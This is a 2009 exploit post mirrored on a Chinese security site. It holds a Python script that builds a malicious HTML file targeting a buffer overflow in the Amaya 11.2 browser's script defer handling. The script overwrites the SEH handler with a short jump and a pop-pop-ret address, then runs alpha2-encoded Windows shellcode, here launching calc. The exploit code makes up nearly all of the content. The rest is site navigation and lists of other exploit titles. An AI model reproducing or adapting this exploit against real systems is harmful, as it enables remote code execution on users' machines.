首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Amaya 11.2 W3C Editor/Browser (defer) Remote BOF Exploit (SEH)
来源:His0k4.hlm[at]gmail.com 作者:His0k4 发布时间:2009-08-04  

#!/usr/bin/python
# _  _   _         __    _     _ _ 
#| || | (_)  ___  /  \  | |__ | | |
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  \__/  |_\_\   |_|
#
#[+] Bug :  Amaya 11.2 W3C Editor/Browser (defer) Remote BOF Exploit (SEH)
#[+] Tested on : Xp sp3 (en) under (vb)
#[+] Refer :   http://www.milw0rm.com/exploits/8314
#[+] Exploit :   His0k4
#[+] Greetz :   All friends (DZ)

#[x] Note : The html file must be browsed from a webserver

#win32_exec calc encoded with alpha2=>374 bytes.
shellcode = (
"JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"TiKyosYyyN8YzN9IT4utL4SkoqRSwcUOJKKJ7rMSzKKLIrkDysv"
"cONtBUOjKrQCwEscPlFEWcWJJVuk9pPkCPqqMeokZTQPKLTkoQa"
"ws8qYJFZmKLsbOVZBVvxEzfPdOwnQ921l6Q4OOyN362JfnrQSmU"
"kkZr1e4OdhgnQLISp9gkKZIntL7qa5Sl4QroV5vUKDhxKyR3KSP"
"MjTrMJvKnbVnlTLkKFOyPozWf7NiqgXcTQVkMDbKqZtBuOXkT1p"
"jusNTJkL4cOMmPszZmLtkmQsbRWUKppS6SpMSQrilNum5nMYmL8"
"k8ok2NSLjKkJ32WzA")

payload =  "<script defer=\""
payload += "\x41"*6914  #change this value if needed
payload += "\x74\x06\x41\x41" #short jump
payload += "\x50\x1A\x03\x10" #pop pop ret somewhere
payload += "\x61"*13 # popad
payload += "\x52\xC3" # push edx,retn C3 not mangled ouf!
payload += "\x44"*668 # padding
payload += shellcode
payload += "\x45"*5000 # result
payload += "\">"

try:
    out_file = open("exploit.html","w")
    out_file.write(payload)
    out_file.close()
    print("\nExploit file created!\n")
except:
    print "Error"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BlazeDVD 5.1 Professional (.PL
·MediaCoder 0.6.2.4275 (.lst Fi
·RadASM 2.2.1.5 (.mnu File) Loc
·Blaze HDTV Player 6.0 (.PLF Fi
·Linux Kernel <= 2.6.31-rc5 sig
·Joomla Component com_jfusion (
·MediaCoder 0.7.1.4486 (.lst) U
·VirtualBox 2.2 - 3.0.2 r49928
·jetAudio 7.1.9.4030 plus vx (.
·Destiny Media Player 1.61 (.pl
·BlazeDVD 5.1/HDTV Player 6.0 (
·Arab Portal v2.x (forum.php qc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved